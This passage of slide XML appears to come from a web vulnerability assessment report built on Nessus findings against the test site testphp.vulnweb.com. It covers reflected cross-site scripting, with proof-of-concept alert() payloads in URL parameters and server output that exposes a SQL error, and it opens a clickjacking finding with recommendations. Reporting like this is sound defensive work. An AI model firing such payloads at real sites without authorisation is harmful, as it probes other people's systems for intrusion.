                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote web server hosts CGI scripts that fail to adequately sanitize request strings with malicious JavaScript. These XSS are likely to be 'non persistent' or 'reflected'.</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47050">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                           </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>              HIGH                 MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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1168400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>By leveraging this issue, an attacker may be able to cause arbitrary HTML and script code to be executed in a user's browser within the security context of the affected site.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800"/>
                      </a:b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36875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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1452875">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1800"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>We recommend to restrict access to the vulnerable application. Contact the vendor for a patch or upgrade to address any cross-site scripting vulnerabilities.</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609" name="Google Shape;609;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7297783" y="2978331"/>
            <a:ext cx="435429" cy="450669"/>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610" name="Google Shape;610;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10868297" y="2978331"/>
            <a:ext cx="435429" cy="450669"/>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611" name="Google Shape;611;p75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9231085" y="2978330"/>
            <a:ext cx="435429" cy="450669"/>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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="617001" y="927027"/>
            <a:ext cx="6877119" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>CGI Generic XSS (quick test)</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="617" name="Google Shape;617;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269967" y="1288869"/>
            <a:ext cx="11669484" cy="5425440"/>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rgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>VULNERABILITY TEST RESULT:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:ea typeface="Courier"/>
              <a:cs typeface="Courier"/>
              <a:sym typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Using the GET HTTP method, Nessus found that : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The following resources may be vulnerable to cross-site scripting (quick test) : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'cat' parameter of the /listproducts.php CGI : /listproducts.php?cat=&lt;IMG%20SRC="javascript:alert(104);"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;!-- InstanceBeginEditable name="content_rgn" --&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;div id="content"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '=&lt; IMG SRC="javascript:alert(104);"&gt;' at line 1 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Warning: mysql_fetch_array() expects parameter 1 to be resource, b [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/div&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>+ The 'pp' parameter of the /hpp/ CGI : /hpp/?pp=&lt;IMG%20SRC="javascript:alert(104);"&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>-------- output -------- </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="?pp=12"&gt;check&lt;/a&gt;&lt;br/&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href="params.php?p=valid&amp;pp=%3CIMG+SRC%3D%22javascript%3Aalert%28104% 29%3B%22%3E"&gt;link1&lt;/a&gt;&lt;br/&gt;&lt;a href="params.php?p=valid&amp;pp=&lt;IMG SRC="java script:alert(104);"&gt;"&gt;link2&lt;/a&gt;&lt;br/&gt;&lt;form action="params.php?p=valid&amp;pp= &lt;IMG SRC="javascript:alert(104);"&gt;"&gt;&lt;input type=submit name=aaaa/&gt;&lt;/form &gt;&lt;br/&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;hr&gt; </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;a href='http://blog.mindedsecurity.com/2009/05/client-side-http-p [...] </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>------------------------ </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>Clicking directly on these URLs should exhibit the issue : </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>(you will probably need to read the HTML source) http://testphp.vulnweb.com/hpp/?pp=&lt;IMG%20SRC="javascript:alert(104);"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Quattrocento Sans"/>
              <a:ea typeface="Quattrocento Sans"/>
              <a:cs typeface="Quattrocento Sans"/>
              <a:sym typeface="Quattrocento Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="618" name="Google Shape;618;p76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="28545"/>
            <a:ext cx="65" cy="40011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dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr b="0" i="0" lang="en-US" sz="800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Quattrocento Sans"/>
                <a:ea typeface="Quattrocento Sans"/>
                <a:cs typeface="Quattrocento Sans"/>
                <a:sym typeface="Quattrocento Sans"/>
              </a:rPr>
            </a:b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77"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495082" y="883485"/>
            <a:ext cx="8013193" cy="64008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3A3838"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Quattrocento Sans"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>28. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US"/>
              <a:t>Web Application Potentially Vulnerable to Clickjacking</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="en-US"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="624" name="Google Shape;624;p77"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="266337" y="1341120"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{28809880-DC93-42FB-976C-2E7F37E6F614}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="11659325"/>
              </a:tblGrid>
              <a:tr h="374000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>OBSERVATION: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2395325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. </a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, with increasing support among all major browser vendors, as a way to mitigate clickjacking and other attacks. The 'frame-ancestors' policy directive restricts which sources can embed the protected resource.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400"/>
                      </a:br>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only mitigations for clickjacking, they are currently the most reliable methods that can be detected through automation. Therefore, this plugin may produce false positives if other mitigation strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any security-sensitive transactions.</a:t>
                      </a:r>
                      <a:endParaRPr sz="14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74000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>RISK:                                                                                        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-US" sz="1800">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>HIGH                  MEDIUM                  LOW</a:t>
                      </a:r>
                      <a:endParaRPr b="1"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781500">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1600"/>
                        <a:buFont typeface="Quattrocento Sans"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Quattrocento Sans"/>
                          <a:ea typeface="Quattrocento Sans"/>
                          <a:cs typeface="Quattrocento Sans"/>
                          <a:sym typeface="Quattrocento Sans"/>
                        </a:rPr>
                        <a:t>This issue could potentially expose the site to a clickjacking or UI redress attack, in which the attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions.</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600"/>
                      </a:br>
                      <a:endParaRPr sz="16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74000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-US" sz="1800"/>
                        <a:t>RECOMMENDATIONS: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763175">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>We recommend to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="0" lang="en-US" sz="1600">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
